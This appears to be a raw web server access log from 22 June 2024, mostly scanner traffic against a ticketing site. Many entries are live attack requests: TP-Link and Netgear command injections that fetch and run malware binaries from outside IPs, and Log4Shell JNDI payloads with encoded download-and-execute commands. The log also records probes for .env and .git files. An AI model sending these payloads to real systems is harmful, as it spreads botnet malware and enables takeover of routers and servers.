114.119.141.139 - - [22/Jun/2024:00:00:02 +0200] "GET /ticket2/opencms/en/venue/?venueid=206ACBCE-F23A-1697-D12B-15E9F015565F HTTP/1.1" 200 63661 87.121.69.27 - - [22/Jun/2024:00:21:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 45.156.129.46 - - [22/Jun/2024:00:21:58 +0200] "GET / HTTP/1.1" 404 - 115.220.2.96 - - [22/Jun/2024:00:30:34 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 115.220.2.96 - - [22/Jun/2024:00:30:37 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 61.158.26.61 - - [22/Jun/2024:00:43:27 +0200] "GET /ticket2/opencms/ HTTP/1.1" 500 - 36.106.166.12 - - [22/Jun/2024:00:44:17 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 220.197.51.228 - - [22/Jun/2024:00:44:20 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 123.178.210.130 - - [22/Jun/2024:00:44:28 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 141.98.83.197 - - [22/Jun/2024:00:45:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [22/Jun/2024:00:45:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 94.156.67.234 - - [22/Jun/2024:00:47:27 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 149.50.103.48 - - [22/Jun/2024:00:52:51 +0200] "GET / HTTP/1.1" 404 - 185.244.36.206 - - [22/Jun/2024:00:58:48 +0200] "GET / HTTP/1.1" 404 - 83.97.73.245 - - [22/Jun/2024:01:09:46 +0200] "GET /ticket2/opencms/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 - 83.97.73.245 - - [22/Jun/2024:01:09:48 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 45.88.91.41 - - [22/Jun/2024:01:21:06 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 - 45.128.232.200 - - [22/Jun/2024:01:27:40 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 78.108.177.51 - - [22/Jun/2024:01:32:11 +0200] "GET / HTTP/1.0" 404 - 52.167.144.238 - - [22/Jun/2024:01:46:36 +0200] "GET /ticket2/opencms/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7CF2D645-F785-0CBB-1B7C-C4711617EAAD HTTP/1.1" 200 73817 78.153.140.177 - - [22/Jun/2024:01:53:02 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 87.121.69.27 - - [22/Jun/2024:01:54:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 45.128.232.200 - - [22/Jun/2024:02:08:42 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 149.50.103.48 - - [22/Jun/2024:02:26:32 +0200] "GET / HTTP/1.1" 404 - 84.54.51.37 - - [22/Jun/2024:02:37:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>+cd+%2Ftmp+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+curl+-O+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+%2Bx+r%3B+.%2Fr%20tplink8080) HTTP/1.1" 400 - 87.236.176.221 - - [22/Jun/2024:02:52:58 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 87.236.176.221 - - [22/Jun/2024:02:52:59 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 87.236.176.61 - - [22/Jun/2024:02:52:59 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 143.255.242.160 - - [22/Jun/2024:02:55:47 +0200] "GET / HTTP/1.1" 404 - 83.97.73.245 - - [22/Jun/2024:03:11:33 +0200] "GET /ticket2/opencms/actuator/gateway/routes HTTP/1.1" 404 - 78.153.140.179 - - [22/Jun/2024:03:23:54 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 148.153.56.82 - - [22/Jun/2024:03:34:13 +0200] "GET /ticket2/opencms/JZIo HTTP/1.1" 404 - 148.153.56.82 - - [22/Jun/2024:03:34:14 +0200] "GET /ticket2/opencms/Crq7 HTTP/1.1" 404 - 148.153.56.82 - - [22/Jun/2024:03:34:15 +0200] "GET /ticket2/opencms/aab8 HTTP/1.1" 404 - 148.153.56.82 - - [22/Jun/2024:03:34:15 +0200] "GET /ticket2/opencms/jquery-3.3.1.slim.min.js HTTP/1.1" 404 - 148.153.56.82 - - [22/Jun/2024:03:34:16 +0200] "GET /ticket2/opencms/aab9 HTTP/1.1" 404 - 148.153.56.82 - - [22/Jun/2024:03:34:17 +0200] "GET /ticket2/opencms/jquery-3.3.2.slim.min.js HTTP/1.1" 404 - 205.210.31.87 - - [22/Jun/2024:03:44:55 +0200] "GET / HTTP/1.0" 404 - 10.158.0.204 - - [22/Jun/2024:03:52:07 +0200] "GET / HTTP/1.1" 404 - 0.0.0.0 - - [22/Jun/2024:03:53:10 +0200] "HEAD null HTTP/1.1" 500 - 141.98.11.15 - - [22/Jun/2024:04:08:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 218.250.115.19 - - [22/Jun/2024:04:19:23 +0200] "CONNECT api64.ipify.org:80 HTTP/1.1" 400 - 141.98.83.197 - - [22/Jun/2024:04:26:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [22/Jun/2024:04:26:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 213.32.122.82 - - [22/Jun/2024:04:27:16 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 213.32.122.82 - - [22/Jun/2024:04:27:17 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 71.6.134.235 - - [22/Jun/2024:04:28:25 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 172.245.208.34 - - [22/Jun/2024:04:28:48 +0200] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 - 91.82.63.74 - - [22/Jun/2024:04:36:20 +0200] "GET / HTTP/1.0" 404 - 161.35.28.81 - - [22/Jun/2024:04:41:21 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 45.156.128.43 - - [22/Jun/2024:04:58:56 +0200] "GET /ticket2/opencms/js/NewWindow_2_all.js HTTP/1.1" 404 - 35.203.210.97 - - [22/Jun/2024:05:02:51 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 35.203.210.97 - - [22/Jun/2024:05:02:52 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 167.94.138.56 - - [22/Jun/2024:05:09:43 +0200] "GET / HTTP/1.1" 404 - 167.94.138.56 - - [22/Jun/2024:05:09:56 +0200] "GET / HTTP/1.1" 404 - 167.94.138.56 - - [22/Jun/2024:05:09:57 +0200] "PRI * HTTP/2.0" 505 - 66.249.66.162 - - [22/Jun/2024:05:25:50 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 66.249.66.162 - - [22/Jun/2024:05:25:51 +0200] "GET /ticket2/opencms/en/venue/?venueid=37CBE37C-7D6F-4665-1B80-1F6AC01C8EBD HTTP/1.1" 200 63612 138.68.132.0 - - [22/Jun/2024:05:29:55 +0200] "GET / HTTP/1.0" 404 - 87.121.69.27 - - [22/Jun/2024:05:43:23 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 80.76.49.105 - - [22/Jun/2024:05:55:32 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 - 149.50.103.48 - - [22/Jun/2024:06:11:55 +0200] "GET / HTTP/1.1" 404 - 159.65.80.211 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 185.91.69.110 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 185.91.69.110 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 185.91.69.110 - - [22/Jun/2024:06:31:06 +0200] "GET / HTTP/1.1" 404 - 185.91.69.110 - - [22/Jun/2024:06:31:07 +0200] "POST / HTTP/1.1" 404 - 185.91.69.110 - - [22/Jun/2024:06:31:08 +0200] "POST / HTTP/1.1" 404 - 185.91.69.110 - - [22/Jun/2024:06:31:09 +0200] "GET /WuEL HTTP/1.1" 404 - 185.91.69.110 - - [22/Jun/2024:06:31:10 +0200] "GET stager64 HTTP/1.1" 400 - 185.91.69.110 - - [22/Jun/2024:06:31:11 +0200] "GET /a HTTP/1.1" 404 - 185.91.69.110 - - [22/Jun/2024:06:31:12 +0200] "GET /download/file.ext HTTP/1.1" 404 - 185.91.69.110 - - [22/Jun/2024:06:31:14 +0200] "GET /SiteLoader HTTP/1.1" 404 - 185.91.69.110 - - [22/Jun/2024:06:31:15 +0200] "GET /mPlayer HTTP/1.1" 404 - 185.91.69.110 - - [22/Jun/2024:06:31:16 +0200] "POST / HTTP/1.1" 404 - 167.71.142.239 - - [22/Jun/2024:06:57:12 +0200] "GET / HTTP/1.0" 404 - 84.54.51.37 - - [22/Jun/2024:07:03:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>+cd+%2Ftmp+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+curl+-O+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+%2Bx+r%3B+.%2Fr%20tplink8080) HTTP/1.1" 400 - 45.128.232.110 - - [22/Jun/2024:07:11:35 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 - 52.167.144.161 - - [22/Jun/2024:07:12:44 +0200] "GET /ticket2/opencms/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=4B941E1B-E4E2-C53E-C693-9FA91BBA9AD5 HTTP/1.1" 200 73810 4.151.218.131 - - [22/Jun/2024:07:14:30 +0200] "GET /ticket2/opencms/owa/auth/logon.aspx HTTP/1.1" 404 - 149.50.103.48 - - [22/Jun/2024:07:15:03 +0200] "GET / HTTP/1.1" 404 - 42.101.38.52 - - [22/Jun/2024:07:23:23 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 141.98.83.197 - - [22/Jun/2024:07:35:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [22/Jun/2024:07:35:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 87.121.69.27 - - [22/Jun/2024:07:59:30 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 206.217.128.98 - - [22/Jun/2024:08:11:10 +0200] "GET / HTTP/1.1" 404 - 141.98.11.15 - - [22/Jun/2024:08:30:51 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 205.210.31.216 - - [22/Jun/2024:08:39:58 +0200] "GET / HTTP/1.1" 404 - 170.64.224.171 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 170.64.224.171 - - [22/Jun/2024:08:43:18 +0200] "GET / HTTP/1.1" 404 - 170.64.224.171 - - [22/Jun/2024:08:43:18 +0200] "GET /download/powershell/ HTTP/1.1" 404 - 172.245.208.34 - - [22/Jun/2024:08:50:45 +0200] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 - 185.244.36.206 - - [22/Jun/2024:09:27:23 +0200] "GET / HTTP/1.1" 404 - 123.160.221.139 - - [22/Jun/2024:09:31:59 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 65.49.1.121 - - [22/Jun/2024:09:34:55 +0200] "GET / HTTP/1.1" 404 - 65.49.1.121 - - [22/Jun/2024:09:35:28 +0200] "GET /favicon.ico HTTP/1.1" 404 - 65.49.1.115 - - [22/Jun/2024:09:35:42 +0200] "GET /?format=json HTTP/1.1" 404 - 65.49.1.108 - - [22/Jun/2024:09:35:55 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 - 149.50.103.48 - - [22/Jun/2024:09:46:36 +0200] "GET / HTTP/1.1" 404 - 87.121.69.27 - - [22/Jun/2024:09:47:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 141.98.83.197 - - [22/Jun/2024:09:55:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [22/Jun/2024:09:55:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 195.246.120.122 - - [22/Jun/2024:10:06:37 +0200] "GET / HTTP/1.0" 404 - 83.97.73.245 - - [22/Jun/2024:10:06:44 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 - 198.235.24.182 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 198.235.24.182 - - [22/Jun/2024:10:12:39 +0200] "??QFX??ZYr???JK#??[???I"==w{"7h???/?+?0?,???'?#?? ?(?$?? " 400 - 178.215.236.38 - - [22/Jun/2024:10:25:37 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 178.215.236.38 - - [22/Jun/2024:10:25:38 +0200] "POST /ticket2/opencms/ HTTP/1.1" 302 - 83.97.73.245 - - [22/Jun/2024:10:28:15 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 - 64.226.88.215 - - [22/Jun/2024:10:32:51 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 120.85.115.239 - - [22/Jun/2024:10:33:53 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 - 149.50.103.48 - - [22/Jun/2024:10:52:08 +0200] "GET / HTTP/1.1" 404 - 142.93.143.207 - - [22/Jun/2024:11:14:22 +0200] "GET / HTTP/1.1" 404 - 142.93.143.207 - - [22/Jun/2024:11:14:22 +0200] "GET /download/powershell/ HTTP/1.1" 404 - 45.148.10.174 - - [22/Jun/2024:11:21:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [22/Jun/2024:11:21:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 2.187.19.126 - - [22/Jun/2024:11:30:43 +0200] "GET / HTTP/1.1" 404 - 65.49.20.67 - - [22/Jun/2024:12:01:02 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 65.49.20.67 - - [22/Jun/2024:12:09:22 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 65.49.20.67 - - [22/Jun/2024:12:11:31 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 65.49.20.67 - - [22/Jun/2024:12:11:31 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 65.49.20.67 - - [22/Jun/2024:12:13:57 +0200] "GET /ticket2/opencms/geoserver/web/ HTTP/1.1" 404 - 149.50.103.48 - - [22/Jun/2024:12:23:59 +0200] "GET / HTTP/1.1" 404 - 94.156.71.235 - - [22/Jun/2024:12:34:15 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 - 206.189.26.180 - - [22/Jun/2024:12:36:10 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 141.98.83.197 - - [22/Jun/2024:12:54:33 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [22/Jun/2024:12:54:33 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 178.215.236.152 - - [22/Jun/2024:13:18:40 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 - 149.50.103.48 - - [22/Jun/2024:13:22:25 +0200] "GET / HTTP/1.1" 404 - 221.122.67.75 - - [22/Jun/2024:13:44:31 +0200] "GET / HTTP/1.1" 404 - 185.191.127.212 - - [22/Jun/2024:13:59:56 +0200] "GET / HTTP/1.1" 404 - 185.191.126.213 - - [22/Jun/2024:14:12:21 +0200] "GET / HTTP/1.1" 404 - 62.78.41.220 - - [22/Jun/2024:14:15:06 +0200] "GET / HTTP/1.1" 404 - 87.121.69.27 - - [22/Jun/2024:14:25:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 134.209.37.17 - - [22/Jun/2024:14:37:26 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 134.209.37.17 - - [22/Jun/2024:14:37:26 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 134.209.37.17 - - [22/Jun/2024:14:37:26 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 87.121.69.27 - - [22/Jun/2024:14:59:23 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 141.98.83.197 - - [22/Jun/2024:15:10:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [22/Jun/2024:15:10:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 35.240.121.17 - - [22/Jun/2024:15:13:40 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 167.94.138.120 - - [22/Jun/2024:15:16:09 +0200] "GET /ticket2/opencms/ HTTP/1.1" 500 - 167.94.138.120 - - [22/Jun/2024:15:16:12 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 167.94.138.120 - - [22/Jun/2024:15:16:25 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 167.94.138.120 - - [22/Jun/2024:15:16:26 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 45.148.10.174 - - [22/Jun/2024:15:33:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [22/Jun/2024:15:33:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 51.138.188.120 - - [22/Jun/2024:15:35:53 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 51.138.188.120 - - [22/Jun/2024:15:35:54 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 23.235.171.243 - - [22/Jun/2024:15:48:48 +0200] "GET /?_2496360151362992223454613381625728 HTTP/1.1" 404 - 23.235.171.243 - - [22/Jun/2024:15:48:48 +0200] "GET /?_774990164584310428032941274007844 HTTP/1.1" 404 - 23.235.171.243 - - [22/Jun/2024:15:48:49 +0200] "GET /?_27831858372801675273417609512696 HTTP/1.1" 404 - 167.94.145.102 - - [22/Jun/2024:15:49:32 +0200] "GET /ticket2/opencms/ HTTP/1.1" 500 - 167.94.145.102 - - [22/Jun/2024:15:49:36 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 167.94.145.102 - - [22/Jun/2024:15:49:46 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 167.94.145.102 - - [22/Jun/2024:15:49:47 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 80.66.76.134 - - [22/Jun/2024:15:51:42 +0200] "/*?Cookie: mstshash=Administr " 400 - 160.153.245.83 - - [22/Jun/2024:16:02:15 +0200] "POST /?password=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTQuNi44OS4xMzQvanMvbHIuc2ggfGJhc2g%3D%7D&username=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTQuNi44OS4xMzQvanMvbHIuc2ggfGJhc2g%3D%7D&id=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTQuNi44OS4xMzQvanMvbHIuc2ggfGJhc2g%3D%7D HTTP/1.1" 404 - 160.153.245.83 - - [22/Jun/2024:16:02:15 +0200] "POST /?id=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTQuNi44OS4xMzQvanMvbHIucHMxJyk%3D%7D&password=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTQuNi44OS4xMzQvanMvbHIucHMxJyk%3D%7D&username=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTQuNi44OS4xMzQvanMvbHIucHMxJyk%3D%7D HTTP/1.1" 404 - 149.50.103.48 - - [22/Jun/2024:16:11:12 +0200] "GET / HTTP/1.1" 404 - 104.168.70.165 - - [22/Jun/2024:16:16:41 +0200] "GET / HTTP/1.1" 404 - 114.119.153.15 - - [22/Jun/2024:16:32:26 +0200] "GET /ticket2/opencms/en/venue/?venueid=1B0D63E0-3E74-D9A1-7710-B72B09BD174E HTTP/1.1" 200 63657 13.56.194.55 - - [22/Jun/2024:16:43:08 +0200] "GET / HTTP/1.1" 404 - 94.156.71.225 - - [22/Jun/2024:17:12:23 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 - 51.138.184.110 - - [22/Jun/2024:17:23:07 +0200] "GET / HTTP/1.1" 404 - 205.210.31.42 - - [22/Jun/2024:17:29:50 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 141.98.11.15 - - [22/Jun/2024:17:31:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 141.98.83.197 - - [22/Jun/2024:17:59:40 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [22/Jun/2024:17:59:40 